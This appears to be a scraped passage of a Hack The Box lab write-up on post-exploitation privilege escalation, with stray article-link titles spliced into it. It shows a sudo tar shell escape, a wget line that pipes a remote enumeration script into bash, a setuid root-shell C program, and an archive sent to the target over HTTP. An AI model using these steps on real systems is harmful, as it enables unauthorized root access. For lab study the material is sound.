Post Exploitation

Elevating Privileges

Running the following command we can see commands that we can execute without a sudo password

sudo -l 

Looks like we can run /bin/tar

tar | GTFOBinsgtfobins.github.io

Upon reading on the tar manual, we can actually use tar to spawn a shell!, wtf?!

sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Post Exploitation Enumeration

wget http://10.10.14.34:80/LinEnum.sh | bash

The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.

$ locate backuper
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer

Hack The Box — TartarSauce Writeup w/o MetasploitMedium

The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.

Create a file on our attacker machine

#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

gcc -m32 -o setuid setuid.c

Useful OSCP Notes & CommandsMedium

chmod u+s setuid

root@kali:/var/www/html# ls -l
total 776
-rw-r--r-- 1 root root  10701 May  8  2020 index.html
-rw-r--r-- 1 root root    612 May  8  2020 index.nginx-debian.html
-rwxr-xr-x 1 root root  46631 Oct 15 08:39 LinEnum.sh
-rw-r--r-- 1 root root 706130 Aug 24 17:17 Resume.pdf
-rwsr-xr-x 1 root root  15520 Nov  9 09:22 setuid
-rw-r--r-- 1 root root    110 Nov  9 09:18 setuid.c
-rw-r--r-- 1 root root      0 Aug 10 22:02 test.py

Compress the var directory and save it to the file called exploit

tar -zcvf exploit var

copy to our target machine in /var/tmp

attack machine: python -m SimpleHTTPServer 80

target machine: wget http://10.10.14.34:80/exploit

check time with

systemctl list-timers